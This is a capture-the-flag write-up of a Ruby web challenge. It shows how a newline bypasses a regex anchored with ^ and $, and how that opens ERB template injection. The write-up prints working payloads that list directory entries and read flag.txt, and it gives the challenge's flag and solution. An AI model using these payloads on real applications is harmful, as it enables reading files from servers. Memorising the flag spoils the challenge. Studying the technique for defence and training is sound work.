1. Overview
This is a web challenge that involves REGEX vulnerability in Ruby that results in SSTI in ERB, a Ruby templating engine.
You may download the files here.
Below contains the source code of the page index.erb:
If we submit a string, the value will be processed by neon.rb. This file also handles the GET request.
We can see that if we send a value, it will send as a POST request. The sent value will be inside params[:neon] which will be checked via REGEX.
If the value passes the check, it will be printed on the new page. As ERB with binding is used, it is subjectable to Server Side Template Injection (SSTI) since it prints whatever content we give it. The only “protection” is that REGEX check.
2. Ruby REGEX vulnerability
Unlike other languages, it is not safe for Ruby to use ^ and $ for REGEX as it can easily be bypassed via a newline character \n (but not the Windows version of \r\n). Ref: https://stackoverflow.com/questions/577653/difference-between-a-z-and-in-ruby-regular-expressions
Since we know it is vulnerable to SSTI and the way to bypass it, it is time to do a proof-of-concept. I used Burp Suite which will be easier for us to send a newline \n character.
Below is the content I sent. I used two spaces which the 2nd space will later be replaced by a newline character \n.
neon= <%= self.class.name %>
Send to a repeater and change to 0x0A for the newline character \n in the hex view.
Remember to URL-encode the string. We should get a matching class name “NeonControllers” as what we will see in neon.rb file.
3. Get the flag
Next, I tried to list the files as sometimes HackTheBox likes to append random values to the flag file name. Ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#ruby
neon=
<%= Dir.entries('.') %>
Since we know it is flag.txt, we can now read the flag which is HTB{r3pl4c3m3n7_s3cur1ty}.
neon=
<%= File.open('flag.txt').read %>
Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
Lamecarrot 